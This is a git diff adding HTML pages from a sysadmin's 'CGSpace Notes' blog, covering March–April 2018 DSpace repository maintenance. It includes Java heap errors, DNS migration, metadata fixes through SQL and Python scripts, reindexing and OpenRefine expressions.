+<li>When I logged in to try it I get a blank white page after continuing and I see this in dspace.log.2018-03-11:</li>
+</ul>
+<pre tabindex="0"><code>2018-03-11 11:38:15,592 WARN  org.dspace.app.webui.servlet.InternalErrorServlet @ :session_id=91C2C0C59669B33A7683570F6010603A:internal_error:-- URL Was: https://cgspace.cgiar.or
+g/jspui/listings-and-reports
+-- Method: POST
+-- Parameters were:
+-- selected_admin_preset: &#34;ilri authors2&#34;
+-- load: &#34;normal&#34;
+-- next: &#34;NEXT STEP &gt;&gt;&#34;
+-- step: &#34;1&#34;
+
+org.apache.jasper.JasperException: java.lang.NullPointerException
+</code></pre><ul>
+<li>Looks like I needed to remove the Humidtropics subject from Listings and Reports because it was looking for the terms and couldn&rsquo;t find them</li>
+<li>I made a quick fix and it&rsquo;s working now (<a href="https://github.com/ilri/DSpace/pull/364">#364</a>)</li>
+</ul>
+<h2 id="2018-03-12">2018-03-12</h2>
+<ul>
+<li>Increase upload size on CGSpace&rsquo;s nginx config to 85MB so Sisay can upload some data</li>
+</ul>
+<h2 id="2018-03-13">2018-03-13</h2>
+<ul>
+<li>I created a new Linode server for DSpace Test (linode6623840) so I could try the block storage stuff, but when I went to add a 300GB volume it said that block storage capacity was exceeded in that datacenter (Newark, NJ)</li>
+<li>I deleted the Linode and created another one (linode6624164) in the Fremont, CA region</li>
+<li>After that I deployed the Ubuntu 16.04 image and attached a 300GB block storage volume to the image</li>
+<li>Magdalena wrote to ask why there was no Altmetric donut for an item on CGSpace, but there was one on the related CCAFS publication page</li>
+<li>It looks the the CCAFS publications page fetches the donut using its DOI, whereas CGSpace queries via Handle</li>
+<li>I will write to Altmetric support and ask them, as perhaps its part of a larger issue</li>
+<li>CGSpace item: <a href="https://cgspace.cgiar.org/handle/10568/89643">https://cgspace.cgiar.org/handle/10568/89643</a></li>
+<li>CCAFS publication page: <a href="https://ccafs.cgiar.org/publications/can-scenario-planning-catalyse-transformational-change-evaluating-climate-change-policy">https://ccafs.cgiar.org/publications/can-scenario-planning-catalyse-transformational-change-evaluating-climate-change-policy</a></li>
+<li>Peter tweeted the Handle link and now Altmetric shows the donut for both the DOI and the Handle</li>
+</ul>
+<h2 id="2018-03-14">2018-03-14</h2>
+<ul>
+<li>Help Abenet with a troublesome Listings and Report question for CIAT author Steve Beebe</li>
+<li>Continue migrating DSpace Test to the new server (linode6624164)</li>
+<li>I emailed ILRI service desk to update the DNS records for dspacetest.cgiar.org</li>
+<li>Abenet was having problems saving Listings and Reports configurations or layouts but I tested it and it works</li>
+</ul>
+<h2 id="2018-03-15">2018-03-15</h2>
+<ul>
+<li>Help Abenet troubleshoot the Listings and Reports issue again</li>
+<li>It looks like it&rsquo;s an issue with the layouts, if you create a new layout that only has one type (<code>dc.identifier.citation</code>):</li>
+</ul>
+<p><img src="/cgspace-notes/2018/03/layout-only-citation.png" alt="Listing and Reports layout"></p>
+<ul>
+<li>The error in the DSpace log is:</li>
+</ul>
+<pre tabindex="0"><code>org.apache.jasper.JasperException: java.lang.ArrayIndexOutOfBoundsException: -1
+</code></pre><ul>
+<li>The full error is here: <a href="https://gist.github.com/alanorth/ea47c092725960e39610db9b0c13f6ca">https://gist.github.com/alanorth/ea47c092725960e39610db9b0c13f6ca</a></li>
+<li>If I do a report for &ldquo;Orth, Alan&rdquo; with the same custom layout it works!</li>
+<li>I submitted a ticket to Atmire: <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=589">https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=589</a></li>
+<li>Small fix to the example citation text in Listings and Reports (<a href="https://github.com/ilri/DSpace/pull/365">#365</a>)</li>
+</ul>
+<h2 id="2018-03-16">2018-03-16</h2>
+<ul>
+<li>ICT made the DNS updates for dspacetest.cgiar.org late last night</li>
+<li>I have removed the old server (linode02 aka linode578611) in favor of linode19 aka linode6624164</li>
+<li>Looking at the CRP subjects on CGSpace I see there is one blank one so I&rsquo;ll just fix it:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=230 and text_value=&#39;&#39;;
+</code></pre><ul>
+<li>Copy all CRP subjects to a CSV to do the mass updates:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=230 group by text_value order by count desc) to /tmp/crps.csv with csv header;
+COPY 21
+</code></pre><ul>
+<li>Once I prepare the new input forms (<a href="https://github.com/ilri/DSpace/issues/362">#362</a>) I will need to do the batch corrections:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i Correct-21-CRPs-2018-03-16.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.crp -t correct -m 230 -n -d
+</code></pre><ul>
+<li>Create a pull request to update the input forms for the new CRP subject style (<a href="https://github.com/ilri/DSpace/pull/366">#366</a>)</li>
+</ul>
+<h2 id="2018-03-19">2018-03-19</h2>
+<ul>
+<li>Tezira has been having problems accessing CGSpace from the ILRI Nairobi campus since last week</li>
+<li>She is getting an HTTPS error apparently</li>
+<li>It&rsquo;s working outside, and Ethiopian users seem to be having no issues so I&rsquo;ve asked ICT to have a look</li>
+<li>CGSpace crashed this morning for about seven minutes and Dani restarted Tomcat</li>
+<li>Around that time there were an increase of SQL errors:</li>
+</ul>
+<pre tabindex="0"><code>2018-03-19 09:10:54,856 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error -
+...
+2018-03-19 09:10:54,862 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL query singleTable Error -
+</code></pre><ul>
+<li>But these errors, I don&rsquo;t even know what they mean, because a handful of them happen every day:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -c &#39;ERROR org.dspace.storage.rdbms.DatabaseManager&#39; dspace.log.2018-03-1*
+dspace.log.2018-03-10:13
+dspace.log.2018-03-11:15
+dspace.log.2018-03-12:13
+dspace.log.2018-03-13:13
+dspace.log.2018-03-14:14
+dspace.log.2018-03-15:13
+dspace.log.2018-03-16:13
+dspace.log.2018-03-17:13
+dspace.log.2018-03-18:15
+dspace.log.2018-03-19:90
+</code></pre><ul>
+<li>There wasn&rsquo;t even a lot of traffic at the time (8–9 AM):</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;19/Mar/2018:0[89]:&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+     92 40.77.167.197
+     92 83.103.94.48
+     96 40.77.167.175
+    116 207.46.13.178
+    122 66.249.66.153
+    140 95.108.181.88
+    196 213.55.99.121
+    206 197.210.168.174
+    207 104.196.152.243
+    294 54.198.169.202
+</code></pre><ul>
+<li>Well there is a hint in Tomcat&rsquo;s <code>catalina.out</code>:</li>
+</ul>
+<pre tabindex="0"><code>Mon Mar 19 09:05:28 UTC 2018 | Query:id: 92032 AND type:2
+Exception in thread &#34;http-bio-127.0.0.1-8081-exec-280&#34; java.lang.OutOfMemoryError: Java heap space
+</code></pre><ul>
+<li>So someone was doing something heavy somehow&hellip; my guess is content and usage stats!</li>
+<li>ICT responded that they &ldquo;fixed&rdquo; the CGSpace connectivity issue in Nairobi without telling me the problem</li>
+<li>When I asked, Robert Okal said CGNET messed up when updating the DNS for cgspace.cgiar.org last week</li>
+<li>I told him that my request last week was for dspacetest.cgiar.org, not cgspace.cgiar.org!</li>
+<li>So they updated the wrong fucking DNS records</li>
+<li>Magdalena from CCAFS wrote to ask about one record that has a bunch of metadata missing in her Listings and Reports export</li>
+<li>It appears to be this one: <a href="https://cgspace.cgiar.org/handle/10568/83473?show=full">https://cgspace.cgiar.org/handle/10568/83473?show=full</a></li>
+<li>The title is &ldquo;Untitled&rdquo; and there is some metadata but indeed the citation is missing</li>
+<li>I don&rsquo;t know what would cause that</li>
+</ul>
+<h2 id="2018-03-20">2018-03-20</h2>
+<ul>
+<li>DSpace Test has been down for a few hours with SQL and memory errors starting this morning:</li>
+</ul>
+<pre tabindex="0"><code>2018-03-20 08:47:10,177 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error -
+...
+2018-03-20 08:53:11,624 ERROR org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter @ Serious Error Occurred Processing Request!
+org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.lang.OutOfMemoryError: Java heap space
+</code></pre><ul>
+<li>I have no idea why it crashed</li>
+<li>I ran all system updates and rebooted it</li>
+<li>Abenet told me that one of Lance Robinson&rsquo;s ORCID iDs on CGSpace is incorrect</li>
+<li>I will remove it from the controlled vocabulary (<a href="https://github.com/ilri/DSpace/pull/367">#367</a>) and update any items using the old one:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# update metadatavalue set text_value=&#39;Lance W. Robinson: 0000-0002-5224-8644&#39; where resource_type_id=2 and metadata_field_id=240 and text_value like &#39;%0000-0002-6344-195X%&#39;;
+UPDATE 1
+</code></pre><ul>
+<li>Communicate with DSpace editors on Yammer about being more careful about spaces and character editing when doing manual metadata edits</li>
+<li>Merge the changes to CRP names to the <code>5_x-prod</code> branch and deploy on CGSpace (<a href="https://github.com/ilri/DSpace/pull/363">#363</a>)</li>
+<li>Run corrections for CRP names in the database:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db dspace -u dspace -p &#39;fuuu&#39;
+</code></pre><ul>
+<li>Run all system updates on CGSpace (linode18) and reboot the server</li>
+<li>I started a full Discovery re-index on CGSpace because of the updated CRPs</li>
+<li>I see this error in the DSpace log:</li>
+</ul>
+<pre tabindex="0"><code>2018-03-20 19:03:14,844 ERROR com.atmire.dspace.discovery.AtmireSolrService @ No choices plugin was configured for  field &#34;dc_contributor_author&#34;.
+java.lang.IllegalArgumentException: No choices plugin was configured for  field &#34;dc_contributor_author&#34;.
+        at org.dspace.content.authority.ChoiceAuthorityManager.getLabel(ChoiceAuthorityManager.java:261)
+        at org.dspace.content.authority.ChoiceAuthorityManager.getLabel(ChoiceAuthorityManager.java:249)
+        at org.dspace.browse.SolrBrowseCreateDAO.additionalIndex(SolrBrowseCreateDAO.java:215)
+        at com.atmire.dspace.discovery.AtmireSolrService.buildDocument(AtmireSolrService.java:662)
+        at com.atmire.dspace.discovery.AtmireSolrService.indexContent(AtmireSolrService.java:807)
+        at com.atmire.dspace.discovery.AtmireSolrService.updateIndex(AtmireSolrService.java:876)
+        at org.dspace.discovery.SolrServiceImpl.createIndex(SolrServiceImpl.java:370)
+        at org.dspace.discovery.IndexClient.main(IndexClient.java:117)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:226)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:78)
+</code></pre><ul>
+<li>I have to figure that one out&hellip;</li>
+</ul>
+<h2 id="2018-03-21">2018-03-21</h2>
+<ul>
+<li>Looks like the indexing gets confused that there is still data in the <code>authority</code> column</li>
+<li>Unfortunately this causes those items to simply not be indexed, which users noticed because item counts were cut in half and old items showed up in RSS!</li>
+<li>Since we&rsquo;ve migrated the ORCID identifiers associated with the authority data to the <code>cg.creator.id</code> field we can nullify the authorities remaining in the database:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span>dspace<span style="color:#f92672">=#</span> <span style="color:#66d9ef">UPDATE</span> metadatavalue <span style="color:#66d9ef">SET</span> authority<span style="color:#f92672">=</span><span style="color:#66d9ef">NULL</span> <span style="color:#66d9ef">WHERE</span> resource_type_id<span style="color:#f92672">=</span><span style="color:#ae81ff">2</span> <span style="color:#66d9ef">AND</span> metadata_field_id<span style="color:#f92672">=</span><span style="color:#ae81ff">3</span> <span style="color:#66d9ef">AND</span> authority <span style="color:#66d9ef">IS</span> <span style="color:#66d9ef">NOT</span> <span style="color:#66d9ef">NULL</span>;
+</span></span><span style="display:flex;"><span><span style="color:#66d9ef">UPDATE</span> <span style="color:#ae81ff">195463</span>
+</span></span></code></pre></div><ul>
+<li>After this the indexing works as usual and item counts and facets are back to normal</li>
+<li>Send Peter a list of all authors to correct:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span>dspace<span style="color:#f92672">=#</span> <span style="color:#960050;background-color:#1e0010">\</span><span style="color:#66d9ef">copy</span> (<span style="color:#66d9ef">select</span> <span style="color:#66d9ef">distinct</span> text_value, <span style="color:#66d9ef">count</span>(<span style="color:#f92672">*</span>) <span style="color:#66d9ef">as</span> <span style="color:#66d9ef">count</span> <span style="color:#66d9ef">from</span> metadatavalue <span style="color:#66d9ef">where</span> metadata_field_id <span style="color:#f92672">=</span> (<span style="color:#66d9ef">select</span> metadata_field_id <span style="color:#66d9ef">from</span> metadatafieldregistry <span style="color:#66d9ef">where</span> element <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;contributor&#39;</span> <span style="color:#66d9ef">and</span> qualifier <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;author&#39;</span>) <span style="color:#66d9ef">AND</span> resource_type_id <span style="color:#f92672">=</span> <span style="color:#ae81ff">2</span> <span style="color:#66d9ef">group</span> <span style="color:#66d9ef">by</span> text_value <span style="color:#66d9ef">order</span> <span style="color:#66d9ef">by</span> <span style="color:#66d9ef">count</span> <span style="color:#66d9ef">desc</span>) <span style="color:#66d9ef">to</span> <span style="color:#f92672">/</span>tmp<span style="color:#f92672">/</span>authors.csv <span style="color:#66d9ef">with</span> csv header;
+</span></span><span style="display:flex;"><span><span style="color:#66d9ef">COPY</span> <span style="color:#ae81ff">56156</span>
+</span></span></code></pre></div><ul>
+<li>Afterwards we&rsquo;ll want to do some batch tagging of ORCID identifiers to these names</li>
+<li>CGSpace crashed again this afternoon, I&rsquo;m not sure of the cause but there are a lot of SQL errors in the DSpace log:</li>
+</ul>
+<pre tabindex="0"><code>2018-03-21 15:11:08,166 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error - 
+java.sql.SQLException: Connection has already been closed.
+</code></pre><ul>
+<li>I have no idea why so many connections were abandoned this afternoon:</li>
+</ul>
+<pre tabindex="0"><code># grep &#39;Mar 21, 2018&#39; /var/log/tomcat7/catalina.out | grep -c &#39;org.apache.tomcat.jdbc.pool.ConnectionPool abandon&#39;
+268
+</code></pre><ul>
+<li>DSpace Test crashed again due to Java heap space, this is from the DSpace log:</li>
+</ul>
+<pre tabindex="0"><code>2018-03-21 15:18:48,149 ERROR org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter @ Serious Error Occurred Processing Request!
+org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.lang.OutOfMemoryError: Java heap space
+</code></pre><ul>
+<li>And this is from the Tomcat Catalina log:</li>
+</ul>
+<pre tabindex="0"><code>Mar 21, 2018 11:20:00 AM org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor run
+SEVERE: Unexpected death of background thread ContainerBackgroundProcessor[StandardEngine[Catalina]]
+java.lang.OutOfMemoryError: Java heap space
+</code></pre><ul>
+<li>But there are tons of heap space errors on DSpace Test actually:</li>
+</ul>
+<pre tabindex="0"><code># grep -c &#39;java.lang.OutOfMemoryError: Java heap space&#39; /var/log/tomcat7/catalina.out
+319
+</code></pre><ul>
+<li>I guess we need to give it more RAM because it now has CGSpace&rsquo;s large Solr core</li>
+<li>I will increase the memory from 3072m to 4096m</li>
+<li>Update <a href="https://github.com/ilri/rmg-ansible-public">Ansible playbooks</a> to use <a href="https://jdbc.postgresql.org/">PostgreSQL JBDC driver</a> 42.2.2</li>
+<li>Deploy the new JDBC driver on DSpace Test</li>
+<li>I&rsquo;m also curious to see how long the <code>dspace index-discovery -b</code> takes on DSpace Test where the DSpace installation directory is on one of Linode&rsquo;s new block storage volumes</li>
+</ul>
+<pre tabindex="0"><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    208m19.155s
+user    8m39.138s
+sys     2m45.135s
+</code></pre><ul>
+<li>So that&rsquo;s about three times as long as it took on CGSpace this morning</li>
+<li>I should also check the raw read speed with <code>hdparm -tT /dev/sdc</code></li>
+<li>Looking at Peter&rsquo;s author corrections there are some mistakes due to Windows 1252 encoding</li>
+<li>I need to find a way to filter these easily with OpenRefine</li>
+<li>For example, Peter has inadvertantly introduced Unicode character 0xfffd into several fields</li>
+<li>I can search for Unicode values by their hex code in OpenRefine using the following GREL expression:</li>
+</ul>
+<pre tabindex="0"><code>isNotNull(value.match(/.*\ufffd.*/))
+</code></pre><ul>
+<li>I need to be able to add many common characters though so that it is useful to copy and paste into a new project to find issues</li>
+</ul>
+<h2 id="2018-03-22">2018-03-22</h2>
+<ul>
+<li>Add ORCID identifier for Silvia Alonso</li>
+<li>Update my Mirage 2 setup notes for Ubuntu 18.04: <a href="https://gist.github.com/alanorth/9bfd29feb7d2e836a9d417633319b3f5">https://gist.github.com/alanorth/9bfd29feb7d2e836a9d417633319b3f5</a></li>
+</ul>
+<h2 id="2018-03-24">2018-03-24</h2>
+<ul>
+<li>More work on the Ubuntu 18.04 readiness stuff for the <a href="https://github.com/ilri/rmg-ansible-public">Ansible playbooks</a></li>
+<li>The playbook now uses the system&rsquo;s Ruby and Node.js so I don&rsquo;t have to manually install RVM and NVM after</li>
+</ul>
+<h2 id="2018-03-25">2018-03-25</h2>
+<ul>
+<li>Looking at Peter&rsquo;s author corrections and trying to work out a way to find errors in OpenRefine easily</li>
+<li>I can find all names that have acceptable characters using a GREL expression like:</li>
+</ul>
+<pre tabindex="0"><code>isNotNull(value.match(/.*[a-zA-ZáÁéèïíñØøöóúü].*/))
+</code></pre><ul>
+<li>But it&rsquo;s probably better to just say which characters I know for sure are not valid (like parentheses, pipe, or weird Unicode characters):</li>
+</ul>
+<pre tabindex="0"><code>or(
+  isNotNull(value.match(/.*[(|)].*/)),
+  isNotNull(value.match(/.*\uFFFD.*/)),
+  isNotNull(value.match(/.*\u00A0.*/)),
+  isNotNull(value.match(/.*\u200A.*/))
+)
+</code></pre><ul>
+<li>And here&rsquo;s one combined GREL expression to check for items marked as to delete or check so I can flag them and export them to a separate CSV (though perhaps it&rsquo;s time to add delete support to my <code>fix-metadata-values.py</code> script:</li>
+</ul>
+<pre tabindex="0"><code>or(
+  isNotNull(value.match(/.*delete.*/i)),
+  isNotNull(value.match(/.*remove.*/i)),
+  isNotNull(value.match(/.*check.*/i))
+)
+</code></pre><ul>
+<li>
+<p>So I guess the routine is in OpenRefine is:</p>
+<ul>
+<li>Transform: trim leading/trailing whitespace</li>
+<li>Transform: collapse consecutive whitespace</li>
+<li>Custom text facet for items to delete/check</li>
+<li>Custom text facet for illegal characters</li>
+</ul>
+</li>
+<li>
+<p>Test the corrections and deletions locally, then run them on CGSpace:</p>
+</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/Correct-2928-Authors-2018-03-21.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3
+$ ./delete-metadata-values.py -i /tmp/Delete-8-Authors-2018-03-21.csv -f dc.contributor.author -m 3 -db dspacetest -u dspace -p &#39;fuuu&#39;
+</code></pre><ul>
+<li>Afterwards I started a full Discovery reindexing on both CGSpace and DSpace Test</li>
+<li>CGSpace took 76m28.292s</li>
+<li>DSpace Test took 194m56.048s</li>
+</ul>
+<h2 id="2018-03-26">2018-03-26</h2>
+<ul>
+<li>Atmire got back to me about the <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=589">Listings and Reports issue</a> and said it&rsquo;s caused by items that have missing <code>dc.identifier.citation</code> fields</li>
+<li>The will send a fix</li>
+</ul>
+<h2 id="2018-03-27">2018-03-27</h2>
+<ul>
+<li>Atmire got back with an updated quote about the DSpace 5.8 compatibility so I&rsquo;ve forwarded it to Peter</li>
+</ul>
+<h2 id="2018-03-28">2018-03-28</h2>
+<ul>
+<li>DSpace Test crashed due to heap space so I&rsquo;ve increased it from 4096m to 5120m</li>
+<li>The error in Tomcat&rsquo;s <code>catalina.out</code> was:</li>
+</ul>
+<pre tabindex="0"><code>Exception in thread &#34;RMI TCP Connection(idle)&#34; java.lang.OutOfMemoryError: Java heap space
+</code></pre><ul>
+<li>Add ISI Journal (cg.isijournal) as an option in Atmire&rsquo;s Listing and Reports layout (<a href="https://github.com/ilri/DSpace/pull/370">#370</a>) for Abenet</li>
+<li>I noticed a few hundred CRPs using the old capitalized formatting so I corrected them:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db cgspace -u cgspace -p &#39;fuuu&#39;
+Fixed 29 occurences of: CLIMATE CHANGE, AGRICULTURE AND FOOD SECURITY
+Fixed 7 occurences of: WATER, LAND AND ECOSYSTEMS
+Fixed 19 occurences of: AGRICULTURE FOR NUTRITION AND HEALTH
+Fixed 100 occurences of: ROOTS, TUBERS AND BANANAS
+Fixed 31 occurences of: HUMIDTROPICS
+Fixed 21 occurences of: MAIZE
+Fixed 11 occurences of: POLICIES, INSTITUTIONS, AND MARKETS
+Fixed 28 occurences of: GRAIN LEGUMES
+Fixed 3 occurences of: FORESTS, TREES AND AGROFORESTRY
+Fixed 5 occurences of: GENEBANKS
+</code></pre><ul>
+<li>That&rsquo;s weird because we just updated them last week&hellip;</li>
+<li>Create a pull request to enable searching by ORCID identifier (<code>cg.creator.id</code>) in Discovery and Listings and Reports (<a href="https://github.com/ilri/DSpace/pull/371">#371</a>)</li>
+<li>I will test it on DSpace Test first!</li>
+<li>Fix one missing XMLUI string for &ldquo;Access Status&rdquo; (cg.identifier.status)</li>
+<li>Run all system updates on DSpace Test and reboot the machine</li>
+</ul>
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2018-04/index.html b/docs/2018-04/index.html
new file mode 100644
index 000000000..0af82af5f
--- /dev/null
+++ b/docs/2018-04/index.html
@@ -0,0 +1,648 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="April, 2018" />
+<meta property="og:description" content="2018-04-01
+
+I tried to test something on DSpace Test but noticed that it&rsquo;s down since god knows when
+Catalina logs at least show some memory errors yesterday:
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2018-04/" />
+<meta property="article:published_time" content="2018-04-01T16:13:54+02:00" />
+<meta property="article:modified_time" content="2019-10-28T13:39:25+02:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="April, 2018"/>
+<meta name="twitter:description" content="2018-04-01
+
+I tried to test something on DSpace Test but noticed that it&rsquo;s down since god knows when
+Catalina logs at least show some memory errors yesterday:
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "April, 2018",
+  "url": "https://alanorth.github.io/cgspace-notes/2018-04/",
+  "wordCount": "3016",
+  "datePublished": "2018-04-01T16:13:54+02:00",
+  "dateModified": "2019-10-28T13:39:25+02:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2018-04/">
+
+    <title>April, 2018 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-04/">April, 2018</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2018-04-01T16:13:54+02:00">Sun Apr 01, 2018</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-04-01">2018-04-01</h2>
+<ul>
+<li>I tried to test something on DSpace Test but noticed that it&rsquo;s down since god knows when</li>
+<li>Catalina logs at least show some memory errors yesterday:</li>
+</ul>
+<pre tabindex="0"><code>Mar 31, 2018 10:26:42 PM org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor run
+SEVERE: Unexpected death of background thread ContainerBackgroundProcessor[StandardEngine[Catalina]] 
+java.lang.OutOfMemoryError: Java heap space
+
+Exception in thread &#34;ContainerBackgroundProcessor[StandardEngine[Catalina]]&#34; java.lang.OutOfMemoryError: Java heap space
+</code></pre><ul>
+<li>So this is getting super annoying</li>
+<li>I ran all system updates on DSpace Test and rebooted it</li>
+<li>For some reason Listings and Reports is not giving any results for any queries now&hellip;</li>
+<li>I posted a message on Yammer to ask if people are using the Duplicate Check step from the Metadata Quality Module</li>
+<li>Help Lili Szilagyi with a question about statistics on some CCAFS items</li>
+</ul>
+<h2 id="2018-04-04">2018-04-04</h2>
+<ul>
+<li>Peter noticed that there were still some old CRP names on CGSpace, because I hadn&rsquo;t forced the Discovery index to be updated after I fixed the others last week</li>
+<li>For completeness I re-ran the CRP corrections on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db dspace -u dspace -p &#39;fuuu&#39;
+Fixed 1 occurences of: AGRICULTURE FOR NUTRITION AND HEALTH
+</code></pre><ul>
+<li>Then started a full Discovery index:</li>
+</ul>
+<pre tabindex="0"><code>$ export JAVA_OPTS=&#39;-Dfile.encoding=UTF-8 -Xmx1024m&#39;
+$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    76m13.841s
+user    8m22.960s
+sys     2m2.498s
+</code></pre><ul>
+<li>Elizabeth from CIAT emailed to ask if I could help her by adding ORCID identifiers to all of Joseph Tohme&rsquo;s items</li>
+<li>I used my <a href="https://gist.githubusercontent.com/alanorth/a49d85cd9c5dea89cddbe809813a7050/raw/f67b6e45a9a940732882ae4bb26897a9b245ef31/add-orcid-identifiers-csv.py">add-orcid-identifiers-csv.py</a> script:</li>
+</ul>
+<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i /tmp/jtohme-2018-04-04.csv -db dspace -u dspace -p &#39;fuuu&#39;
+</code></pre><ul>
